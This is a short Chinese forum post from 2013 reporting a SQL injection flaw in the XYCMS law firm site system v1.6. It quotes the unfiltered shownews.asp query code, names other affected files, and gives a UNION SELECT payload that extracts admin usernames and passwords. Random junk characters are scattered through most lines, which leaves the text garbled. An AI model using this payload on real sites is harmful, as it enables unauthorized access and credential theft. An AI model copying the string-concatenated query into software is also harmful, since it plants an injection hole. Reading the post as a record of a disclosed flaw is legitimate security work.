前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
* x7 B, H, Y: z- y) g% u
9 J `# j% N* E3 u/ l淫荡分割线- ?& Q0 ]( x* O! \0 C
--------------------------------------------------------6 e1 J4 j0 q* `6 V U/ Y$ o7 s
9 X& w) B" L/ o" f9 W' x+ q2 h* U' q审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)/ `5 n" Q3 b' Z3 C+ g: ]
源码地址:http://down.chinaz.com/soft/29233.htm# E/ P. `/ Z9 H7 ~* c& h, s
# x5 {6 Q ?- _+ e/ {# D
漏洞文件:shownews.asp. Z" H' h+ P. z6 ^1 d, ?/ c7 `
漏洞代码:7-13行& `1 X. {/ b( Y$ a0 ~
+ e: I, E( s" U( J% |/ O
. _! F/ c8 D- U<% 6 p# h! v: _& M
id=request.QueryString("id")
: f3 j9 d" W% j+ T& A
3 n! j7 H2 v f. z' Qset snews=server.createobject("adodb.recordset")
3 S# K0 }) i7 f3 Fexec="select * from [news] where id="&id% b9 W8 d2 K8 R9 _ }
snews.open exec,conn,1,1: A( u/ }" r* W* {3 d
%>
: ~/ u5 d7 N/ s3 U$ o; V
4 H. @3 u. F* Q3 } `& H# S 9 Q) K. H- z, S0 r
什么过滤都没有 直造成注入
' u1 l7 I% t4 p1 q4 Y0 H# y/ [5 m; S
7 v: i9 _2 O% d( i6 U9 n4 \注入点:http://127.0.0.1:99/shownews.asp?id=xx
, B8 J3 D9 M7 O5 m8 j# e4 _
' z2 P6 l3 {) D, v `+ D4 c9 |其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
: x( Y. x: `0 [% M
) @- h, G6 J% K P% }
' w. }9 ], f* M; Mexp: union select 1,admin,password,4,5,7 from admin_user
; p. \3 p- `% n
: h: g9 l9 A6 h7 [ |
发表于 2013-4-4 17:28:12
收藏
支持
反对